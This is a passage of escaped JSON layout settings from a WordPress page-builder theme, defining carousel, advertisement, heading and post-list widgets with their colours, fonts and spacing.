\",\"settings\":{\"section_magzma_carousel_post_5\":\"\",\"posts_per_page\":\"6\",\"offset\":\"\",\"category\":[\"6\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_carousel_post_5_layout\":\"\",\"use_shadow\":\"use\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2\":\"rgba(0,0,0,0.6)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#a66bbe\",\"bg_category_color\":\"#ffffff\",\"bg_hov_category_color\":\"#ffffff\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":16},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"category_font_weight\":\"600\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_carousel_post_5_control\":\"\",\"choose_column\":3,\"choose_column_mobile\":1,\"column_gap\":\"2\",\"width\":\"600\",\"height\":\"400\",\"navigation\":\"none\",\"navigation_arrows_color\":\"#000000\",\"navigation_dots_color\":\"#000000\",\"autoplay\":\"use\",\"autoplay_ms\":\"2500\",\"auto_loop\":\"use\",\"keyboard_nav\":\"\",\"centered_slide\":\"\",\"effect_type\":\"slide\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-carousel-slider-5\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"34.995\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"n74aj2y\",\"elType\":\"widget\",\"settings\":{\"section_magzma_advertising\":\"\",\"advertising_type\":\"image_and_url\",\"image\":{\"url\":\"http:\\/\\/demo7.magzma.com\\/wp-content\\/uploads\\/sites\\/8\\/2017\\/01\\/banner-380x250z.jpg\",\"id\":329},\"image_ad_size\":\"full\",\"link_to\":\"none\",\"link\":{\"is_external\":\"\",\"url\":\"\"},\"ad_script\":\"\",\"sticky_ads\":\"no\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-advertising-builder\"},{\"id\":\"6o4m5rj\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Game\",\"title_size\":\"h6\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#e5e100\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"gqb8mcu\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"7\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-4\",\"section_magzma_post_list_4_post_control\":\"\",\"width\":\"\",\"height\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_4\":\"on\",\"post_icon_color1_post_list_4\":\"#61c436\",\"post_icon_color2_post_list_4\":\"#007AFE\",\"post_icon_size_post_list_4\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_4\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title_post_list_4\":\"on\",\"typhography_title_post_list_4_color\":\"#000000\",\"typhography_title_post_list_4_hov_color\":\"#aaaaaa\",\"post_list_4_title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_weight\":\"700\",\"post_list_4_title_font_weight_tablet\":\"400\",\"post_list_4_title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date_post_list_4\":\"on\",\"typhography_date_post_list_4_color\":\"#777777\",\"date_title_4_hov_color\":\"#777777\",\"post_list_4_date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list4_date_font_weight\":\"400\",\"post_list4_date_font_weight_tablet\":\"400\",\"post_list4_date_font_weight_mobile\":\"400\",\"section_magzma_post_list_4_column_control\":\"\",\"post_list4_margin_bottom\":\"\",\"horizontal_use_list_4\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_4\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-4\"},{\"id\":\"asc7q3k\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"3\",\"offset\":\"\",\"category\":[\"7\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2\":\"rgba(0,0,0,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\